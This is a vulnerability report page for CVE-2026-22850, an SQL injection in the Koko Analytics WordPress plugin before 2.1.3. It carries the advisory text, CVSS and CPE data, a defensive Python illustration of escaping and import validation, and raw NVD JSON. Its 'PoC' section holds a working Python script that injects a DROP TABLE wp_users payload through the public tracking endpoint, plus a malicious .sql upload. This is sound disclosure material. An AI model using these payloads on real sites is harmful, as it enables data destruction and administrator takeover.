Security Vulnerability Report
CVE-2026-22850 CVSS 8.3 HIGH

CVE-2026-22850

Published: 2026-01-19 17:15:50
Last Modified: 2026-03-09 21:16:45

Description

Koko Analytics is an open-source analytics plugin for WordPress. Versions prior to 2.1.3 are vulnerable to arbitrary SQL execution through unescaped analytics export/import and permissive admin SQL import. Unauthenticated visitors can submit arbitrary path (`pa`) and referrer (`r`) values to the public tracking endpoint in src/Resources/functions/collect.php, which stores those strings verbatim in the analytics tables. The admin export logic in src/Admin/Data_Export.php writes these stored values directly into SQL INSERT statements without escaping. A crafted path such as "),('999','x');DROP TABLE wp_users;-- breaks out of the value list. When an administrator later imports that export file, the import handler in src/Admin/Data_Import.php reads the uploaded SQL with file_get_contents, performs only a superficial header check, splits on semicolons, and executes each statement via $wpdb->query with no validation of table names or statement types. Additionally, any authenticated user with manage_koko_analytics can upload an arbitrary .sql file and have it executed in the same permissive way. Combined, attacker-controlled input flows from the tracking endpoint into exported SQL and through the import execution sink, or directly via malicious uploads, enabling arbitrary SQL execution. In a worst-case scenario, attackers can achieve arbitrary SQL execution on the WordPress database, allowing deletion of core tables (e.g., wp_users), insertion of backdoor administrator accounts, or other destructive/privilege-escalating actions. Version 2.1.3 patches the issue.
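To make the defensive point in the description concrete, here is an added Python example (not code from the plugin, the advisory or the PoC below) that models the two sinks the description names: an export that interpolates stored strings into an INSERT value list, and an import that splits the file on semicolons and runs each piece. It places the crafted path from the description beside a hardened export (proper literal quoting) and a hardened import (quote-aware statement splitting plus an allow-list of statement type and table), and round-trips the result through an in-memory SQLite table as a stand-in for MySQL. The table and column names, the allow-list and the helper names are assumptions made for the illustration.

```python
import re
import sqlite3

# Constructed sample data: rows as the public tracking endpoint would have stored
# them. Row 999 carries the crafted path quoted in the advisory description.
CRAFTED_PATH = "),('999','x');DROP TABLE wp_users;--"
STORED_ROWS = [
    (1, "/about/", 3),
    (999, CRAFTED_PATH, 1),
]
# Table and column names are assumed for illustration; they are not the plugin's.
TABLE = "wp_koko_analytics_pages"
ALLOWED_TABLES = {TABLE}


def export_naive(rows):
    # The flaw as described: stored strings are interpolated into the value list verbatim.
    values = ",".join(f"({i},'{p}',{v})" for i, p, v in rows)
    return f"INSERT INTO {TABLE} (id, path, pageviews) VALUES {values};"


def sql_literal(value: str) -> str:
    # SQL string literal with embedded quotes doubled, so the value can never close
    # the literal. MySQL also treats backslash as an escape; in WordPress code use
    # $wpdb->prepare() instead of hand escaping.
    return "'" + value.replace("'", "''") + "'"


def export_escaped(rows):
    # Hardened export: strings through sql_literal(), numbers through int().
    values = ",".join(f"({int(i)},{sql_literal(p)},{int(v)})" for i, p, v in rows)
    return f"INSERT INTO {TABLE} (id, path, pageviews) VALUES {values};"


def split_naive(sql: str):
    # The import behaviour the description attributes to the vulnerable handler:
    # split on every semicolon and run each piece.
    return [s.strip() for s in sql.split(";") if s.strip()]


def split_statements(sql: str):
    # Quote-aware splitter: a semicolon inside a '...' literal does not end the
    # statement, so an escaped export round-trips. Comments and quoted identifiers
    # are deliberately not handled in this illustration.
    stmts, buf, in_str, i = [], [], False, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            buf.append(c)
            if c == "'":
                if i + 1 < len(sql) and sql[i + 1] == "'":
                    buf.append("'")
                    i += 1  # doubled quote is an escaped quote; stay inside the literal
                else:
                    in_str = False
        elif c == "'":
            in_str = True
            buf.append(c)
        elif c == ";":
            stmt = "".join(buf).strip()
            if stmt:
                stmts.append(stmt)
            buf = []
        else:
            buf.append(c)
        i += 1
    tail = "".join(buf).strip()
    if tail:
        stmts.append(tail)
    return stmts


INSERT_RE = re.compile(r"^INSERT\s+INTO\s+(\w+)\s*\(", re.IGNORECASE)


def check_statement(stmt: str):
    # Allow-list check: only INSERT, and only into the plugin's own tables.
    m = INSERT_RE.match(stmt)
    if not m:
        return False, "not an INSERT statement"
    if m.group(1) not in ALLOWED_TABLES:
        return False, f"table {m.group(1)} is not in the allow-list"
    return True, ""


def validate_import(sql: str):
    # Validate the whole file before anything runs, so one bad statement aborts
    # the import instead of executing partially.
    for stmt in split_statements(sql):
        ok, why = check_statement(stmt)
        if not ok:
            return False, f"{why}: {stmt[:40]!r}"
    return True, ""


def import_checked(sql: str):
    # Runs a validated export into an in-memory SQLite table and returns the rows,
    # showing that the escaped export round-trips the crafted path as plain data.
    ok, why = validate_import(sql)
    if not ok:
        raise ValueError(f"import rejected: {why}")
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {TABLE} (id INTEGER, path TEXT, pageviews INTEGER)")
    for stmt in split_statements(sql):
        conn.execute(stmt)
    return conn.execute(f"SELECT id, path, pageviews FROM {TABLE} ORDER BY id").fetchall()
```

Two things this illustrates that the description only implies: splitting the naive export on semicolons yields a standalone `DROP TABLE wp_users` statement, which `check_statement` rejects on sight; and escaping on the export side alone is not enough, because an import that still splits on every semicolon would break the escaped literal in the middle. The durable fix for an import feature is to not execute an uploaded file through a raw query at all, but to parse it into rows and insert them through prepared statements into a fixed set of tables.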

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibericode:koko_analytics:*:*:*:*:*:wordpress:*:* - VULNERABLE
Koko Analytics < 2.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22850 PoC - SQL Injection via Tracking Endpoint
# Author: Security Research
# Target: Koko Analytics WordPress Plugin < 2.1.3
import requests
import urllib.parse

target_url = "http://target-wordpress-site.com/"

# Malicious payload to inject via tracking endpoint
# This payload attempts to break out of value list in export SQL
malicious_path = "'),('999','x');DROP TABLE wp_users;--"

# Step 1: Submit malicious data via public tracking endpoint
tracking_endpoint = f"{target_url}?koko-analytics-track=1"
params = {
    'pa': malicious_path,
    'r': 'https://attacker-controlled-site.com'
}

print("[*] Sending malicious payload to tracking endpoint...")
response = requests.get(tracking_endpoint, params=params)
print(f"[*] Response status: {response.status_code}")

# Step 2: If admin exports data and imports it, the DROP TABLE will execute
# The attacker can also directly upload a malicious .sql file if authenticated
# Example malicious SQL file content for direct upload:
exploit_sql = """-- Koko Analytics
INSERT INTO wp_koko_analytics_pages (id, pageview) VALUES (999, 'malicious');
DROP TABLE wp_users;
--"""

print("[*] PoC demonstrates SQL injection via tracking endpoint")
print("[*] When admin exports and imports, arbitrary SQL will execute")
print("[*] Mitigation: Upgrade to Koko Analytics >= 2.1.3")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22850", "sourceIdentifier": "[email protected]", "published": "2026-01-19T17:15:50.430", "lastModified": "2026-03-09T21:16:44.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Koko Analytics is an open-source analytics plugin for WordPress. Versions prior to 2.1.3 are vulnerable to arbitrary SQL execution through unescaped analytics export/import and permissive admin SQL import. Unauthenticated visitors can submit arbitrary path (`pa`) and referrer (`r`) values to the public tracking endpoint in src/Resources/functions/collect.php, which stores those strings verbatim in the analytics tables. The admin export logic in src/Admin/Data_Export.php writes these stored values directly into SQL INSERT statements without escaping. A crafted path such as \"),('999','x');DROP TABLE wp_users;-- breaks out of the value list. When an administrator later imports that export file, the import handler in src/Admin/Data_Import.php reads the uploaded SQL with file_get_contents, performs only a superficial header check, splits on semicolons, and executes each statement via $wpdb->query with no validation of table names or statement types. Additionally, any authenticated user with manage_koko_analytics can upload an arbitrary .sql file and have it executed in the same permissive way. Combined, attacker-controlled input flows from the tracking endpoint into exported SQL and through the import execution sink, or directly via malicious uploads, enabling arbitrary SQL execution. In a worst-case scenario, attackers can achieve arbitrary SQL execution on the WordPress database, allowing deletion of core tables (e.g., wp_users), insertion of backdoor administrator accounts, or other destructive/privilege-escalating actions. Version 2.1.3 patches the issue."}, {"lang": "es", "value": "Koko Analytics es un plugin de análisis de código abierto para WordPress. 
Las versiones anteriores a la 2.1.3 son vulnerables a la ejecución arbitraria de SQL debido a la exportación/importación de datos analíticos sin escapar y a una importación de SQL administrativa poco restrictiva. Los visitantes no autenticados pueden enviar valores arbitrarios de ruta (`pa`) y de origen (`r`) al punto final de seguimiento público en src/Resources/functions/collect.php, que almacena esas cadenas tal cual en las tablas de análisis. La lógica de exportación de administración en src/Admin/Data_Export.php escribe estos valores almacenados directamente en sentencias SQL INSERT sin escapar. Una ruta manipulada como \"),(“999”,'x'); \"DROP TABLE wp_users;--\" se sale de la lista de valores. Cuando un administrador importa posteriormente ese archivo de exportación, el controlador de importación en src/Admin/Data_Import.php lee el SQL cargado con file_get_contents, realiza solo una comprobación superficial del encabezado, divide por puntos y coma, y ejecuta cada instrucción mediante $wpdb->query sin validar los nombres de las tablas ni los tipos de instrucción. Además, cualquier usuario autenticado con el permiso manage_koko_analytics puede subir un archivo .sql arbitrario y hacer que se ejecute de la misma manera permisiva. En conjunto, las entradas controladas por el atacante fluyen desde el punto final de seguimiento hacia el SQL exportado y a través del canal de ejecución de la importación, o directamente mediante subidas maliciosas, lo que permite la ejecución arbitraria de SQL. En el peor de los casos, los atacantes pueden ejecutar código SQL arbitrario en la base de datos de WordPress, lo que les permitiría eliminar tablas fundamentales (por ejemplo, wp_users), crear cuentas de administrador con puertas traseras o llevar a cabo otras acciones destructivas o de escalada de privilegios. 
La versión 2.1.3 corrige este problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibericode:koko_analytics:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.1.3", "matchCriteriaId": "CB3DC92C-231A-456F-A8CE-109A55F6F278"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1HdQKf42prwrBUUG2CwbIkccTp2i6HR6d/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Mitigation"]}, {"url": "https://github.com/ibericode/koko-analytics/commit/7b7d58f4a1838c8203cf4e ... (truncated)